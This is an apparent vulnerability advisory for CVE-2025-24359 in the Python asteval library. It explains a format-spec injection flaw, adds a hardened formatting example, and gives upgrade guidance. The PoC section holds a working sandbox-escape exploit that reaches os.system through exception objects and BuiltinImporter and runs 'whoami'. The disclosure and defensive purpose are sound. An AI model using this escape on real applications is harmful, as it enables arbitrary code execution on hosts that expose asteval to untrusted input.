First published: Fri Jan 24 2025
### Summary

If an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.

### Details

The vulnerability is rooted in how `asteval` handles `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) method uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:

```py
def on_formattedvalue(self, node):  # ('value', 'conversion', 'format_spec')
    "formatting used in f-strings"
    val = self.run(node.value)
    fstring_converters = {115: str, 114: repr, 97: ascii}
    if node.conversion in fstring_converters:
        val = fstring_converters[node.conversion](val)
    fmt = '{__fstring__}'
    if node.format_spec is not None:
        # the evaluated format_spec is spliced into the template string
        fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'
    return fmt.format(__fstring__=val)
```

The code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. Because `str.format` re-parses that string as a template, any replacement field the attacker places inside the format spec is evaluated against `val`. This can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.
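To make the root cause concrete, here is an added example (not asteval's own code and not its 1.0.6 fix) that puts the vulnerable formatting pattern beside a hardened replacement built on the `format()` builtin, which passes the spec to `val.__format__` as an opaque string instead of re-parsing it as a template. The probe spec and its value are constructed for the demonstration.

```python
# Added example: the advisory's vulnerable pattern next to a hardened form.
# Neither function is asteval's own code; the hardening is our own suggestion.

def vulnerable_format(val, format_spec=None):
    # Mirrors on_formattedvalue: the spec is spliced into a template and
    # str.format re-parses it, so '{...}' inside the spec becomes a nested
    # replacement field and attribute lookups in it are evaluated on val.
    fmt = '{__fstring__}'
    if format_spec is not None:
        fmt = f'{{__fstring__:{format_spec}}}'
    return fmt.format(__fstring__=val)


def hardened_format(val, format_spec=None):
    # format() hands the spec to val.__format__ unparsed: no template
    # expansion, so no attribute traversal is possible through the spec.
    if format_spec is None:
        return format(val)
    # Defence in depth: once nested fields have been evaluated, a legitimate
    # format spec never contains braces, so reject them before formatting.
    if '{' in format_spec or '}' in format_spec:
        raise ValueError("braces are not allowed in a format spec")
    return format(val, format_spec)


# Constructed probe: the spec only becomes valid ('>5') after the nested
# field '{__fstring__.real}' is evaluated against the value (5.real == 5),
# which proves the attribute lookup happened inside str.format.
PROBE_SPEC = '>{__fstring__.real}'


def demo():
    leaked = vulnerable_format(5, PROBE_SPEC)  # '    5': traversal occurred
    try:
        hardened_format(5, PROBE_SPEC)
        blocked = False
    except ValueError:
        blocked = True  # the hardened form refuses the probe
    return leaked, blocked
```

Ordinary specs such as `x` or `.2f` behave identically in both functions; only specs carrying replacement fields diverge.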
### PoC

The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:

```py
from asteval import Interpreter

aeval = Interpreter()
code = """
# def lender():
#     ga

def pwn():
    try:
        f"{dict.mro()[1]:'\\x7B__fstring__.__getattribute__.s\\x7D'}"
    except Exception as ga:
        ga = ga.obj
        sub = ga(dict.mro()[1],"__subclasses__")()
        importer = None
        for i in sub:
            if "BuiltinImporter" in str(i):
                importer = i.load_module
                break
        os = importer("os")
        os.system("whoami")

# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below
# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works

pwn()
"""
aeval(code)
```
Credit: security-advisories@github.com
Affected Software | Affected Version | How to fix
---|---|---
pip/asteval | <=1.0.5 | 1.0.6
ASTEVAL | <1.0.6 | 
CVE-2025-24359 is considered a high severity vulnerability due to the potential for arbitrary code execution.
To fix CVE-2025-24359, upgrade the asteval library to version 1.0.6 or later.
Versions of asteval up to and including 1.0.5 are affected by CVE-2025-24359.
Applications using affected versions of asteval may allow attackers to execute arbitrary Python code.
There are no recommended workarounds for CVE-2025-24359, and upgrading is the best course of action.